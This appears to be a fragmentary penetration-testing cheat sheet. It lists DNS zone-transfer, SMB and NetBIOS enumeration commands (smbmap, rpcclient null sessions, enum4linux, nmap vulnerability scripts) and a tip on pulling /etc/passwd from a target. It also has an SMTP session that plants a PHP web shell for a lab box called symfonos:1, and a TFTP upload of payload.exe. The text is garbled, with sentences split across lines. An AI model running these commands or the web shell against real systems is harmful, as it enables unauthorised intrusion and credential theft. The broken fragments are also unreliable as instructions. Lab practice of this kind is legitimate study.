ls -l /usr/share/nmap/scripts/*vuln*
.dig <target domain> @<dns server> axfr
host -l <target domain> <dns server>
dig @[DNS SERVER HERE] axfr [DOMAIN NAME HERE]
nmblookup -A $ip
smbmap -H $ip
echo exit | smbclient -L \\\\$ip
nmap --script smb-enum-shares -p 139,445 $ip
smbmap -H $ip
rpcclient -U "" -N $ip
smbclient \\\\$ip\\[share name]
nmap --script smb-vuln* -p 139,445 $ip
enum4linux -a $ip
smbver.sh $ip (port)
nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
nbtscan -r 192.168.1.0/24
rpcclient
to automate enumerating an SMB server. Produces tons of results when a null session is successful. NOTE: Make sure to downgrade rpcclient before using. /usr/share/smbmap
directoryget
command to download absolute path files from the remote system. Eg. get /etc/passwd
will download the passwd file and overwrite YOUR /etc/passwd
. Use get /etc/passwd /tmp/passwd
instead.smbclient
, rpcclient
, net
and nmblookup
telnet $ip 25
EHLO rowbot
MAIL FROM:[email protected]
RCPT TO:$usernamehere
DATA
Subject: shell
<?php system($_GET['cmd']); ?>
.
quit
symfonos:1 box
connecting/interacting:
tftp $ip
tftp> put payload.exe
tftp> get file.txt